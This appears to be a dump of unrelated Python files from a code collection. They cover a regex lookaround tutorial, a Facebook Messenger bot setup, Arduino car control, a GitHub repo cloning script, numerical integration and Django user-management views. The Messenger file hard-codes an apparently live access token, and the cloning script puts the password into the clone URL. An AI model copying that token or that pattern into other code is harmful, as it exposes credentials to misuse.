# behind main pattern
# 4 Types of Look Around
# 1. ?= ->Positive look around
# 2. ?! -> Negative look around(It means that the group does'nt have any subpattern ahead main pattern)
# 3. ?<= -> Positive look behind
# 4. ?<! -> Negative look behind (It means that the group does'nt have any subpattern behind main pattern)
#Similar Syntax
# ?: Non-capture group
# ?p Naming group
#Example
'''
In the below string we are looking to consume the second column value",
only if the first column starts with ABC and the last column ",
has the value 'active'
So only the first row and last row satisfies this condition which will
output the value '1.1.1.1' and 'x.x.x.x
'''
string = '''
ABC1 1.1.1.1 20151118 active
ABC2 2.2.2.2 20151118 inactive
ABC3 x.x.x.x xxxxxxxx active
'''
pattern = re.compile('ABC\w\s+ (\S+)\s+\S+\s+(?=active)') # Positive look around
# So here ABC is first we are looking follwed by alphanumeric chr i.e 1,2 or any word then followed by bunch of space
# then follwed by bunch of Non space chr , here we have taken (\S+) in group as we neeed to find only this part
# then follweed by bunch of space and then follwed by active , so here it is looking for active but not capturing it
re.findall(pattern,string)
re.search(pattern,string) # The output shows that it is not capturing active but only taking it to look in pattern
#However we can also use non-captruing group
pattern = re.compile('ABC\w\s+ (\S+)\s+\S+\s+(?:active)')
re.findall(pattern,string)
re.search(pattern,string) # But here in output it is consuming active word, so if we want to specify some condition then
#use non-captruing group
#look aheads don't consume, non-capture group consumes
string ='abababacb'
#so we need to find wherever a's surronded by b , here we have 2 cases
pattern = re.compile('(?:b) (a) (?:b)')
re.findall(pattern,string)
#Here we did'nt get any result becoz when cursor starts from a and goes to b then there is no match as a is not surronded
# But when it goes for second occurance of a it should give the result as here 2nd a is surronded by b , but since
# cursor has already consume the 'b' at 2nd position for finding first a sp it starts from 2nd occurance of a
# and again when it starts from a there is no b behind 2nd occuance of a
#But when we give look around
pattern = re.compile('(?<=b)(a)(?=b)')
re.findall(pattern,string)
# Here it goes for 'a' and find 'b' behind and it fails but for 2nd occcurance of 'a' there b is behind and after a
# Here it does'nt consume first occurance of 'b'
####################################################################################################
|
996,862 | 8419f0225e4b5bbafd79d433faf727a81ef922d5 | import cgi
#dates
# Canonical month names used to validate user-supplied month strings.
months = ['January',
          'February',
          'March',
          'April',
          'May',
          'June',
          'July',
          'August',
          'September',
          'October',
          'November',
          'December']
def valid_month(month):
    """Return the canonical (title-cased) month name, or None if invalid.

    Guards against None/empty input for consistency with valid_year,
    which already checks truthiness before use.
    """
    if month and month.title() in months:
        return month.title()
def valid_day(day):
    """Return the day as an int if it is a digit string in 1..31, else None.

    Guards against None input (consistent with valid_year); the original
    also re-converted an already-int value with int(day) on return.
    """
    if day and day.isdigit():
        day = int(day)
        if 0 < day < 32:
            return day
def valid_year(year):
    """Return the year as an int when it is a digit string in 1900..2020."""
    if not (year and year.isdigit()):
        return None
    value = int(year)
    if 1899 < value < 2021:
        return value
#validation
def escape_html(s):
    """HTML-escape *s*, including double quotes.

    cgi.escape was deprecated in Python 3.2 and removed in 3.8;
    html.escape is the stdlib replacement (it additionally escapes
    single quotes, which is safe for attribute contexts).
    """
    import html  # local import so the file's top-level imports stay untouched
    return html.escape(s, quote=True)
def delete():
    """Delete the record whose rowid is typed into delete_box, then clear the box.

    Fixes from the original: sqlte3.connet -> sqlite3.connect, the missing
    space in "DELETE FROMtaska", conn.cursor / conn.close referenced but
    never called, and user input concatenated into the SQL string.
    """
    import sqlite3  # local import; the original referenced a misspelled 'sqlte3'
    conn = sqlite3.connect("tasklist.db")
    try:
        cur = conn.cursor()
        # Parameterized query instead of string concatenation (SQL injection).
        # Table name kept as in the original -- verify it should not be 'tasks'.
        cur.execute("DELETE FROM taska WHERE oid=?", (delete_box.get(),))
        # commit changes
        conn.commit()
    finally:
        # close connection (always, even on error)
        conn.close()
    delete_box.delete(0, END)
996,864 | 7b106035a1b14d413ef6481fe3cf19d0a4c5f92c | import requests
from flask import url_for
from application.core.constants import LANDING_MESSAGE
# SECURITY: restore loading the token from the environment, e.g.
# ACCESS_TOKEN = os.environ['ACCESS_TOKEN'] -- the literal token hard-coded
# below is a leaked credential and should be revoked and rotated.
ACCESS_TOKEN = 'EAACy5fCj3rgBAP98hkUBZB2GCgecTnWfPz1b47b0SeLSq2QZAD8lvJxZCrnNlxrvuEQV3vVxqQ3CNER49BZCTlAlBvPMx6XX0f8K8cPGF9cQvXgJwboPLVwJPxOuMrZAAWl2AFaCSFJ2EROyhPEVxv0hfiZClqqy6bZC5ylpXfotAZDZD'
# VERIFY_TOKEN = os.environ['VERIFY_TOKEN']
VERIFY_TOKEN = 'some_verify_token'
MESSENGER_PROFILE_URL = (
'https://graph.facebook.com/v2.6/me/messenger_profile?access_token=%s' %
ACCESS_TOKEN)
['Schools', 'Jobs', 'Events', 'News', 'Posts', 'Projects']
side_menu_payload = {
"persistent_menu": [
{
"locale": "default",
"composer_input_disabled": False,
"call_to_actions": [
{
"title": "Courses",
"type": "postback",
"payload": "DISPLAY_ALL_COURSES"
},
{
"title": "Projects",
"type": "postback",
"payload": "DISPLAY_ALL_PROJECTS"
},
{
"title": "More",
"type": "nested",
"call_to_actions": [
{
"title": "Events",
"type": "postback",
"payload": "DISPLAY_ALL_EVENTS"
},
{
"title": "Jobs",
"type": "postback",
"payload": "DISPLAY_ALL_JOBS"
},
{
"title": "More",
"type": "nested",
"call_to_actions": [
{
"title": "Feeds",
"type": "postback",
"payload": "DISPLAY_ALL_FEEDS"
},
{
"title": "News",
"type": "postback",
"payload": "DISPLAY_ALL_NEWS"
},
{
"title": "Blocs",
"type": "web_url",
"url":
'https://blocs-backend.herokuapp.com/blocs'
}
]
}
]
},
]
}
]
}
def add_side_menu():
    """POST the persistent-menu payload to the Messenger Profile API.

    Returns the raw response body (bytes) so the caller can print/log it.
    """
    return requests.post(MESSENGER_PROFILE_URL, json=side_menu_payload).content
def add_get_started():
    """Register the Get Started button postback with the Messenger Profile API.

    Returns the raw response body (bytes).
    """
    payload = {
        "get_started": {
            "payload": "GET_STARTED_PAYLOAD"
        }
    }
    return requests.post(MESSENGER_PROFILE_URL, json=payload).content
def add_greeting():
    """Set the bot's greeting text (default locale and en_US) to LANDING_MESSAGE.

    Returns the raw response body (bytes).
    """
    payload = {
        "greeting": [
            {
                "locale": "default",
                "text": LANDING_MESSAGE
            }, {
                "locale": "en_US",
                "text": LANDING_MESSAGE
            }
        ]
    }
    return requests.post(MESSENGER_PROFILE_URL, json=payload).content
if __name__ == '__main__':
# print(add_get_started())
print(add_side_menu())
print(add_greeting())
|
996,865 | 6456ec6e482bcec0d8f8bb29b1552d6a64bc8a08 | #!/usr/bin/env python
import time
import serial
class car:
    """Serial bridge to an Arduino-driven two-wheel car.

    Each command frame is a single letter ('w'/'a'/'s'/'d'/'x') followed by
    two bytes: left and right wheel PWM. Public speed arguments are 0-100
    and are rescaled to the motor PWM range [Lval_for_motor, Hval_for_motor].
    """
    def __init__(self, port = '/dev/ttyACM0', baud_rate = 9600):
        try:
            # BUG FIX: the original hard-coded 9600 and ignored baud_rate.
            self.car = serial.Serial(port, baud_rate)
            print("Arduino connected on port {}".format(port))
        except (RuntimeError, TypeError, NameError):
            print("Not able to connect arduino on port {}".format(port))
        self.Lval_for_motor = 0    # lower bound of motor PWM
        self.Hval_for_motor = 255  # upper bound of motor PWM
        self.lastThrottle = 0      # last commanded throttle (0-100), used by brake mode 2
    def map(self, val, inputL, inputH, outputL, outputH):
        """Linearly rescale val from [inputL, inputH] to [outputL, outputH].

        BUG FIX: the original ignored inputL in the numerator; all internal
        calls use inputL=0, so existing behaviour is unchanged.
        """
        scaled = (float(val - inputL) / (inputH - inputL)) * (outputH - outputL) + outputL
        return int(scaled)
    def _send(self, command, aleft, aright):
        """Scale 0-100 wheel values to PWM and write one command frame."""
        aleft = self.map(aleft, 0, 100, self.Lval_for_motor, self.Hval_for_motor)
        aright = self.map(aright, 0, 100, self.Lval_for_motor, self.Hval_for_motor)
        self.car.write(command + chr(aleft) + chr(aright))
    def forward(self, aleft, aright):
        """Drive forward; aleft/aright are 0-100 wheel speeds."""
        self._send('w', aleft, aright)
    def right(self, aleft, aright):
        """Turn right; aleft/aright are 0-100 wheel speeds."""
        self._send('d', aleft, aright)
    def left(self, aleft, aright):
        """Turn left; aleft/aright are 0-100 wheel speeds."""
        self._send('a', aleft, aright)
    def reverse(self, aleft, aright):
        """Drive backwards; aleft/aright are 0-100 wheel speeds."""
        self._send('s', aleft, aright)
    def stop(self, aleft = 0, aright = 0):
        """Engage the motor driver's halt command."""
        self._send('x', aleft, aright)
    def throttle(self, throt):
        """Drive straight at *throt* (0-100) and remember it for delayed braking."""
        self.forward(throt, throt)
        # BUG FIX: the original line was the bare no-op expression
        # 'self.lastThrottle'; the assignment was clearly intended.
        self.lastThrottle = throt
    def brake(self, mode = 0, brak = 100):
        """Stop the car.

        mode = 0 => drop the forward PWM straight to 0
        mode = 1 => enable the halt feature in the motor driver
        mode = 2 => delayed halt, ramping the PWM down by *brak* per step
        """
        if mode == 0:
            self.forward(0, 0)
        elif mode == 1:
            self.stop()
        elif mode == 2:
            # BUG FIX: the original looped on an undefined name 'val';
            # ramp the remembered throttle down instead.
            while self.lastThrottle > 0:
                self.forward(self.lastThrottle, self.lastThrottle)
                self.lastThrottle = self.lastThrottle - brak
                # tune the sleep value
                time.sleep(0.01)
            self.lastThrottle = 0
            self.forward(0, 0)
|
996,866 | 1a02545ad87d5b3eb7d6684b94aab0b39eb816eb | import os
import requests
import git
import shutil
from getpass import getpass
ORG = 'EC327-Fall2019'
def parse_students():
    """Prompt for a usernames file and return (usernames, count).

    Keeps asking until an existing path is given; blank lines are skipped.
    """
    while True:
        filename = input("Enter the path to your usernames file: ")
        if os.path.exists(filename):
            break
        print("Invalid file")
    students = []
    with open(filename, 'r') as file:
        for line in file:
            name = line.rstrip('\n')
            if name:
                students.append(name)
    student_count = len(students)
    print(f'Succesfully parsed {student_count} student usernames')
    return students, student_count
def get_credentials():
    """Prompt for GitHub username/email and password (input hidden) and return both."""
    user = input("Enter either your GitHub username or email: ")
    pwd = getpass("Enter your GitHub password: ")
    return user, pwd
def download_assignments(students, username, password):
    """Clone each student's assignment repo into a local directory.

    Prompts for the assignment name and a destination directory, then for
    every student clones {ORG}/{assignment}-{student} with the given GitHub
    credentials. Existing per-student directories are wiped first. Prints a
    summary and the students whose clone failed.
    """
    assignment = input("Enter the assignment name (ex: PA1): ")
    assignment_path = input("Enter the directory to dump all the repos (leave blank to use assignment name): ")
    if not assignment_path.replace(' ', ''):
        # Blank (or all-spaces) answer: default to the assignment name.
        assignment_path = assignment
    os.makedirs(assignment_path, exist_ok=True)
    success_count = 0
    fail_students = []
    for student in students:
        student_path = os.path.join(assignment_path, student)
        if (os.path.exists(student_path)):
            shutil.rmtree(student_path)
        os.makedirs(student_path)
        try:
            # SECURITY NOTE(review): the password is embedded in the clone URL
            # and may end up in shell history / .git/config; consider a token
            # or a credential helper instead.
            git.Git(student_path).clone(f"https://{username}:{password}@github.com/{ORG}/{assignment}-{student}.git", assignment)
            print(f"Cloned {assignment} repo of student {student} to {student_path}")
            success_count += 1
        except Exception as e:
            print(f"Failed to clone {assignment} repo of student {student}")
            print(f"Error: {e}")
            # Remove the partial directory so a retry starts clean.
            shutil.rmtree(student_path)
            fail_students.append(student)
    print(f"\nSuccesfully downloaded {success_count} repos")
    print(f"Failed to download {len(fail_students)} repos\n")
    if (len(fail_students)):
        print(f"Failed for students: {fail_students}\n")
|
996,867 | a7ca18c6fefb9afdec3d94a3ab85a668c8e9ed85 | # Fails : 181. py
# Autors : Egils Keišs
# Apliecibas numurs : 181REB314
# Datums : 03.12.18
# Sagatave funkcijas saknes mekleeshanai ar dihatomijas metodi
# -*- coding : utf -8 -*-
from math import cos, fabs
from time import sleep
def f1(x):
    """Integrand: (x^2 + x + 1) / (cos(x)^2 + 0.1).

    BUG FIX: the original return line was missing a closing parenthesis,
    which made the whole file a SyntaxError.
    """
    return ((x*x)+x+1)/((cos(x)*cos(x))+0.1)
# Midpoint-rule integration of f1 over [a, b], doubling the number of
# subintervals until two successive estimates differ by less than eps.
# NOTE(review): the file header mentions the dichotomy (bisection) method,
# but this code actually performs numerical integration -- confirm intent.
n = 1          # number of subintervals; BUG FIX: was never initialised (NameError)
h = 0.
a = 0.; b = 6.2832
I1 = 0.
eps = 0.0001
I2 = (b-a) * ( f1(a) + f1(b) ) / 2   # initial trapezoid estimate
while (fabs(I2-I1)>eps):
    n = n*2
    h = (b-a)/n
    I1 = I2
    I2 = 0.
    for k in range(0, n):
        I2 = I2 + h*f1(a+(k+0.5)*h)
# BUG FIX: %d truncated the float bounds (b printed as 6); %g keeps them.
print("a = %g, b = %g" % (a, b))
print ("Integrals:" ,I2)
# NOTE(review): k is the last midpoint index (n-1), not a true iteration count.
print ("Iteraciju skaits:" ,k)
|
996,868 | cf6f19680bfe942e813a3e922b207c7be9cf8b54 | # -*- coding: utf-8 -*-
import datetime
from django.db import transaction
from django.db.models import Q
from django.shortcuts import render, get_object_or_404
from django.contrib.auth.decorators import login_required
from django.contrib import auth, messages
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.contrib.auth import authenticate, login, logout
from django.urls import reverse_lazy, reverse
from django.utils import timezone
from django.views.generic.base import View
from django.views.generic.detail import DetailView
from django.views.generic.edit import UpdateView
from django.contrib.auth.models import User
from captcha.helpers import captcha_image_url
from captcha.models import CaptchaStore
from menu.views import get_user_grant_list
from .models import UserProfile, SlotEmailGroup
from .forms import LoginForm, RegisterForm, ForgetPwdForm, ModifyPwdForm, MyProfileForm, QuoteUserForm, ResetPwdForm
from .forms import SlotUserUpdateForm, SlotUserForm
from .forms import email_check
from django.shortcuts import redirect
from quote.models import Company, UserSetupProfit, UKRange, EuroCountry
MY_MENU_LOCAL = 'MY_PROFILE'
@login_required
def logout(request):
    """Log the current user out and send them to the login page.

    NOTE(review): this view shadows django.contrib.auth.logout imported at
    the top of the file; LogoutView.get below therefore calls this view,
    not the auth helper.
    """
    auth.logout(request)
    return HttpResponseRedirect("/user/login")
@login_required
def pwd_change(request, pk):
    """Change user *pk*'s password after verifying the old one.

    GET renders an empty form; POST validates the old password via
    authenticate(), saves the new one, and redirects to the login page.
    """
    user = get_object_or_404(User, pk=pk)
    if request.method == "POST":
        form = ModifyPwdForm(request.POST)
        if form.is_valid():
            password = form.cleaned_data['old_password']
            username = user.username
            user = auth.authenticate(username=username, password=password)
            if user is not None and user.is_active:
                # BUG FIX: the original read form.changed_data['password2'];
                # changed_data is a *list* of field names, so indexing it
                # with a string raised TypeError. cleaned_data holds values.
                new_password = form.cleaned_data['password2']
                user.set_password(new_password)
                user.save()
                # BUG FIX: redirect was relative ("user/login"), which
                # resolves against the current URL; use the absolute path
                # used elsewhere in this module.
                return HttpResponseRedirect("/user/login")
            else:
                return render(request, 'password_reset.html', {"form": form,
                                                               "user": user,
                                                               "message": "Old password is wrong. Try again",
                                                               'menu_active': 'PA',
                                                               })
    else:
        form = ModifyPwdForm()
    return render(request, 'password_reset.html', {'form': form, 'user': user})
# 用户登录
class LoginView(View):
    """Sign-in view: GET renders the form + CAPTCHA, POST authenticates.

    Accepts either username or e-mail; on success routes the user to the
    booking system or the quote system according to profile.system_menu.
    """
    def get(self, request):
        # CAPTCHA image: hashkey is the generated secret, image_url the
        # address of the rendered captcha image.
        hashkey = CaptchaStore.generate_key()
        image_url = captcha_image_url(hashkey)
        login_form = LoginForm()
        # locals() passes every local variable to the template context.
        return render(request, "sign-in.html", locals())
    def post(self, request):
        login_form = LoginForm(request.POST)
        username = request.POST.get("username", "")
        pass_word = request.POST.get("password", "")
        system_name = request.POST.get("system_name", "BOOKING-SYSTEM")
        if login_form.is_valid():
            # Resolve an e-mail login to its account username.
            if email_check(username):
                filter_result = User.objects.filter(email__exact=username)
                if filter_result:
                    username = filter_result[0].username
            else:
                filter_result = User.objects.filter(username__exact=username)
                if filter_result:
                    username = filter_result[0].username
            user = authenticate(username=username, password=pass_word)
            if user is not None:
                if user.is_active:
                    login(request, user)
                    # Route into the requested system when the user may use it.
                    if system_name in user.profile.system_menu:
                        if system_name == "BOOKING-SYSTEM":
                            return redirect("slot:slot_list")  # enter BOOKING-SYSTEM
                        else:
                            return redirect("users:my_profile", pk=user.id)  # enter Quote system
                    else:
                        # Otherwise fall back to the system the user can access.
                        if user.profile.system_menu == "BOOKING-SYSTEM":
                            return redirect("slot:slot_list")  # enter BOOKING-SYSTEM
                        else:
                            return redirect("users:my_profile", pk=user.id)  # enter Quote system
                else:
                    hashkey = CaptchaStore.generate_key()
                    image_url = captcha_image_url(hashkey)
                    msg = "User is be suspend. Please contact system administrator."
                    return render(request, "sign-in.html", locals())
            else:
                # Fresh CAPTCHA for the retry.
                hashkey = CaptchaStore.generate_key()
                image_url = captcha_image_url(hashkey)
                msg = "Error username or password."
                # locals() passes every local variable to the template context.
                return render(request, "sign-in.html", locals())
        else:
            hashkey = CaptchaStore.generate_key()
            image_url = captcha_image_url(hashkey)
            # locals() passes every local variable to the template context.
            return render(request, "sign-in.html", locals())
# 用户注册 - 尚未完成
class RegisterView(View):
    """User registration (incomplete: confirmation e-mail not yet sent)."""
    def get(self, request):
        """Show an empty registration form."""
        context = {"register_form": RegisterForm()}
        return render(request, "register.html", context)
    def post(self, request):
        """Validate the form; reject duplicate e-mails, else show success."""
        register_form = RegisterForm(request.POST)
        if not register_form.is_valid():
            return render(request, "register.html", {"register_form": register_form})
        user_name = request.POST.get("email", "")
        pass_word = request.POST.get("password", "")
        if UserProfile.objects.filter(email=user_name):
            return render(request, "register.html", {"register_form": register_form, "msg": "email is existed"})
        # send_register_email(user_name, "register")
        return render(request, "register_mail_success.html")
# 忘记密码 - 尚未完成
class ForgetPwdView(View):
    """Forgotten-password flow (incomplete: reset e-mail not yet sent)."""
    def get(self, request):
        # Show an empty "forgot password" form.
        forgetpwd_form = ForgetPwdForm()
        return render(request, "forgetpwd.html", {"forgetPwd_form": forgetpwd_form})
    def post(self, request):
        # Validate the e-mail and, if known, (eventually) send a reset link.
        forgetpwd_form = ForgetPwdForm(request.POST)
        if forgetpwd_form.is_valid():
            email = request.POST.get("email", "")
            if not (UserProfile.objects.filter(email=email)):
                return render(request, "forgetpwd.html",
                              {"forgetPwd_form": forgetpwd_form, "msg": "Email address can't be found."})
            # send a new mail for reset password
            # send_register_email(email, "forget")
            return render(request, "send_resetPwd_success.html")
        else:
            return render(request, "forgetpwd.html", {"forgetPwd_form": forgetpwd_form})
# 重置 QUOTE 系统 用户密码
class ResetPwdView(View):
    """Admin-side password reset for a QUOTE-system user (old password not required)."""
    def get(self, request, pk):
        # Render the reset form for user *pk*.
        user = User.objects.get(id=pk)
        return render(request, "user_profile_detail_reset_password.html", {"menu_active": 'USERS',
                                                                           'user': user
                                                                           })
    def post(self, request, pk):
        # Validate the new password pair and save it on user *pk*.
        reset_pwd_form = ResetPwdForm(request.POST)
        user = User.objects.get(id=pk)
        password = request.POST.get("password", "")
        re_password = request.POST.get("re_password", "")
        if reset_pwd_form.is_valid():
            user.set_password(password)
            user.save()
            # return redirect('users:edit_quote_user', pk=pk)
            return render(request, "user_profile_detail_reset_password_success.html",
                          {"menu_active": 'USERS',
                           'menu_grant': get_user_grant_list(request.user.id),
                           'reset_pwd_form': reset_pwd_form,
                           "user": user,
                           'password': password,
                           're_password': re_password,
                           })
        else:
            return render(request, "user_profile_detail_reset_password.html", {"menu_active": 'USERS',
                                                                               'menu_grant': get_user_grant_list(
                                                                                   request.user.id),
                                                                               'reset_pwd_form': reset_pwd_form,
                                                                               "user": user,
                                                                               'password': password,
                                                                               're_password': re_password,
                                                                               })
# 更新 QUOTE system 的用户密码
class ChangeQuoteUserPwdView(View):
    """Self-service password change for a QUOTE-system user (old password required)."""
    def get(self, request, pk):
        # Render the change-password form for user *pk*.
        user = User.objects.get(id=pk)
        return render(request, "user_change_password.html", {"menu_active": MY_MENU_LOCAL,
                                                             'menu_grant': get_user_grant_list(request.user.id),
                                                             'user': user,
                                                             })
    def post(self, request, pk):
        old_password = request.POST.get("old_password", "")
        password = request.POST.get("password", "")
        re_password = request.POST.get("re_password", "")
        # Verify the old password against the *logged-in* user's account.
        user = auth.authenticate(username=request.user.username, password=old_password)
        if user is not None and user.is_active:
            new_password = request.POST.get("password", "")
            change_pwd_form = ModifyPwdForm(request.POST)
            if change_pwd_form.is_valid():
                user.set_password(new_password)
                user.save()
                # Changing one's own password invalidates the session: re-login.
                return redirect('users:login')
            else:
                return render(request, "user_change_password.html", {"menu_active": MY_MENU_LOCAL,
                                                                     'menu_grant': get_user_grant_list(request.user.id),
                                                                     'change_pwd_form': change_pwd_form,
                                                                     'message': '',
                                                                     'old_password': old_password,
                                                                     'password': password,
                                                                     're_password': re_password,
                                                                     })
        else:
            return render(request, 'user_change_password.html', {'menu_active': MY_MENU_LOCAL,
                                                                 'menu_grant': get_user_grant_list(request.user.id),
                                                                 "message": "Old password is wrong. Try again",
                                                                 'old_password': old_password,
                                                                 'password': password,
                                                                 're_password': re_password,
                                                                 })
# 退出系统
class LogoutView(View):
    """Log out and show the sign-in page again with a fresh CAPTCHA."""
    def get(self, request):
        # NOTE(review): this calls the module-level logout() *view* above
        # (which shadows django.contrib.auth.logout); its redirect return
        # value is discarded, but the session is still flushed.
        logout(request)
        # CAPTCHA image: hashkey is the generated secret, image_url the image address.
        hashkey = CaptchaStore.generate_key()
        image_url = captcha_image_url(hashkey)
        login_form = LoginForm()
        # locals() passes every local variable to the template context.
        return render(request, "sign-in.html", locals())
# 用户资料
class MyProfile(DetailView):
    """Read-only profile page for a quote-system user."""
    model = User
    template_name = 'my_profile.html'
    def get_context_data(self, **kwargs):
        """Extend the default context with menu state and the company list."""
        context = super().get_context_data(**kwargs)
        context.update({
            'menu_active': MY_MENU_LOCAL,
            'menu_grant': get_user_grant_list(self.request.user.id),
            'all_company': Company.objects.all(),
        })
        return context
# 更新 QUOTE 用户资料
class MyProfileUpdateView(UpdateView):
    """Edit the current quote-system user's core fields and profile extras."""
    model = User
    form_class = MyProfileForm
    template_name = 'my_profile_update.html'
    def get_context_data(self, **kwargs):
        # Add menu state and the full company list for the favourites picker.
        context = super().get_context_data(**kwargs)
        all_company = Company.objects.all()
        context['menu_active'] = MY_MENU_LOCAL
        context['menu_grant'] = get_user_grant_list(self.request.user.id)
        context['all_company'] = all_company
        return context
    def form_invalid(self, form):  # page shown again when validation fails
        response = super().form_invalid(form)
        return response
    def form_valid(self, form):
        # Persist the profile-table fields that live outside the User model.
        user_profile = UserProfile.objects.filter(user_id=self.kwargs['pk'])
        user_profile.update(telephone=form.data['telephone'], favorite_company=form.data['favorite_company'])
        return super(MyProfileUpdateView, self).form_valid(form)
    def get_success_url(self):
        # Back to the read-only profile page after saving.
        return reverse_lazy("users:my_profile", kwargs={'pk': self.object.pk})
# 新增 QUOTE 用户
class AddUserView(View):
    """Create a QUOTE-system user plus its profile and profit-setup rows."""
    def get(self, request):
        # Render the empty "add user" form.
        all_company = Company.objects.all()
        return render(request, "add_user_profile.html", {'menu_active': 'USERS',
                                                         'menu_grant': get_user_grant_list(request.user.id),
                                                         'all_company': all_company,
                                                         })
    def post(self, request):
        user_form = QuoteUserForm(request.POST)
        all_company = Company.objects.all()
        if not user_form.is_valid():
            return render(request, "add_user_profile.html", {'user_form': user_form,
                                                             'menu_active': 'USERS',
                                                             'menu_grant': get_user_grant_list(request.user.id),
                                                             'all_company': all_company,
                                                             })
        # Creating a user writes two tables: auth_user and users_userprofile.
        # auth_user defaults: is_staff=0 (not staff), is_active=1, is_superuser=0.
        uk_range = UKRange.objects.all()
        euro_country = EuroCountry.objects.all()
        # get all data from user_form
        email = request.POST.get("email", "")
        username = request.POST.get('username')
        first_name = request.POST.get('first_name')
        last_name = request.POST.get('last_name')
        telephone = request.POST.get('telephone', '')
        permission = "000000000000"  # no menu grants yet (fixed-width mask)
        booking_system = request.POST.get("booking_system", "")
        quote_system = request.POST.get("quote_system", "")
        if booking_system and quote_system:
            system_menu = "BOOKING-SYSTEM|QUOTE-SYSTEM"
        else:
            if booking_system:
                system_menu = "BOOKING-SYSTEM"
            else:
                system_menu = "QUOTE-SYSTEM"
        # Create the auth_user row.
        with transaction.atomic():
            User.objects.create(username=username,
                                email=email,
                                first_name=first_name,
                                last_name=last_name,
                                is_staff=0,
                                is_active=1,
                                is_superuser=0,
                                last_login=timezone.now(),
                                date_joined=timezone.now(),
                                )
        # Store the password (hashed via set_password).
        user = User.objects.get(username__exact=username)
        if user is not None and user.is_active:
            password = request.POST.get('password')
            user.set_password(password)
            user.save()
        # Extra profile data: profit figures start at zero.
        uk_percent = 0
        uk_fix_amount = 0
        euro_percent = 0
        euro_fix_amount = 0
        fav_company = 1  # default favourite company id = 1 - PARCEL FORCE
        with transaction.atomic():  # create the users_userprofile row
            UserProfile.objects.create(user_id=user.id,
                                       telephone=telephone,
                                       mod_date=datetime.datetime.now(),
                                       staff_role=0,
                                       favorite_company_id=fav_company,
                                       euro_fix_amount=euro_fix_amount,
                                       euro_percent=euro_percent,
                                       uk_fix_amount=uk_fix_amount,
                                       uk_percent=uk_percent,
                                       menu_grant=permission,
                                       system_menu=system_menu,
                                       )
        with transaction.atomic():
            for uk in uk_range:  # UK profit rows in q_user_setup_profit
                UserSetupProfit.objects.create(is_uk='UK',
                                               fix_amount=uk_fix_amount,
                                               percent=uk_percent,
                                               uk_area_id=uk.id,
                                               user_id=user.id,
                                               )
            for euro in euro_country:  # Europe profit rows in q_user_setup_profit
                UserSetupProfit.objects.create(is_uk='EURO',
                                               fix_amount=euro_fix_amount,
                                               percent=euro_percent,
                                               euro_area_id=euro.id,
                                               user_id=user.id,
                                               )
        return HttpResponseRedirect(reverse('quote:user-list'))
# 编辑 QUOTE 用户
class EditUserView(View):
    """Display and (eventually) update a quote-system user profile.

    NOTE(review): the original post() carried ~90 lines of commented-out
    user-creation code copied from AddUserView; removed here as dead code
    (AddUserView holds the live version).
    """
    def get(self, request, pk):
        """Render the profile detail page for user *pk*."""
        all_company = Company.objects.all()
        user = User.objects.get(id=pk)
        return render(request, "user_profile_detail.html", {'menu_active': 'USERS',
                                                            'menu_grant': get_user_grant_list(request.user.id),
                                                            'all_company': all_company,
                                                            'user': user,
                                                            })
    def post(self, request, pk=None):
        """Validate the posted form; re-render on failure, else go to the user list.

        BUG FIX: get() takes pk but the original post() did not, so a URL
        pattern that supplies pk raised TypeError; accept it with a default
        to stay backward-compatible.
        """
        user_form = QuoteUserForm(request.POST)
        all_company = Company.objects.all()
        if not user_form.is_valid():
            return render(request, "add_user_profile.html", {'user_form': user_form,
                                                             'menu_active': 'USERS',
                                                             'menu_grant': get_user_grant_list(request.user.id),
                                                             'all_company': all_company,
                                                             })
        return HttpResponseRedirect(reverse('quote:user-list'))
# 修改 QUOTE 的用户菜单的权限
class SetUserPermissionView(View):
    """Edit a QUOTE user's menu permissions and system-access flags."""
    def get(self, request, pk):
        # Render the permission checkboxes with the user's current grants.
        user = User.objects.get(id=pk)
        permission_list = get_user_grant_list(pk)
        return render(request, "user_set_permission.html", {'menu_active': 'USERS',
                                                            'menu_grant': get_user_grant_list(request.user.id),
                                                            'user': user,
                                                            'permission_list': permission_list,
                                                            })
    def post(self, request, pk):
        # Each checkbox posts "1" when ticked; default is "0".
        booking_system = request.POST.get("booking_system", "0")
        quote_system = request.POST.get("quote_system", "0")
        express_price = request.POST.get("express_price", "0")
        sku_list = request.POST.get("sku_list", "0")
        air_freight = request.POST.get("air_freight", "0")
        lcl_price = request.POST.get("lcl_price", "0")
        user_maintenance = request.POST.get("user_maintenance", "0")
        xiaomi_bill = request.POST.get("xiaomi_bill", "0")
        lcl_data_maintenance = request.POST.get("lcl_data_maintenance", "0")
        flc_quote = request.POST.get("flc_quote", "0")
        flc_data_maintenance = request.POST.get("flc_data_maintenance", "0")
        ocean_quote = request.POST.get("ocean_quote", "0")
        # Pack the flags into a fixed-width bitmask string (last 4 bits reserved).
        permission_string = express_price + sku_list + air_freight + lcl_price + user_maintenance + xiaomi_bill \
                            + lcl_data_maintenance + flc_quote + flc_data_maintenance + ocean_quote + "0000"
        booking_system_string = ""
        if booking_system == "1":
            booking_system_string = "BOOKING-SYSTEM"
        quote_system_string = ""
        if quote_system == "1":
            quote_system_string = "QUOTE-SYSTEM"
        if booking_system_string and quote_system_string:
            system_menu = booking_system_string + "|" + quote_system_string
        else:
            system_menu = booking_system_string + quote_system_string
        permission_queryset = UserProfile.objects.filter(user_id=pk)
        # Promote a plain user (role 0) to role 1 once permissions are granted.
        if permission_queryset[0].staff_role == 0:
            staff_role = 1
        else:
            staff_role = permission_queryset[0].staff_role
        if permission_queryset:
            permission_queryset.update(menu_grant=permission_string,
                                       system_menu=system_menu,
                                       staff_role=staff_role,
                                       )
        return redirect("users:edit_quote_user", pk=pk)
# 显示 Slot 用户资料
class SlotUserProfile(DetailView):
    """Read-only profile page for a booking-system (slot) user."""
    model = User
    template_name = 'slot_user_profile.html'
    def get_context_data(self, **kwargs):
        """Add e-mail groups for the user's op position plus menu state."""
        context = super().get_context_data(**kwargs)
        position = self.request.user.profile.op_position
        context['all_email_group'] = SlotEmailGroup.objects.filter(position__exact=position)
        context['menu_grant'] = get_user_grant_list(self.request.user.id, "BOOKING-SYSTEM")
        context['page_tab'] = 3
        return context
# 更新 Slot 用户资料
class SlotUserProfileUpdateView(UpdateView):
    """Edit a slot user's core fields plus profile extras."""
    model = User
    form_class = SlotUserUpdateForm
    template_name = 'slot_user_profile_update.html'
    def get_context_data(self, **kwargs):
        # Add e-mail groups for the user's op position plus menu state.
        context = super().get_context_data(**kwargs)
        email_group_queryset = SlotEmailGroup.objects.filter(position__exact=self.request.user.profile.op_position)
        context['all_email_group'] = email_group_queryset
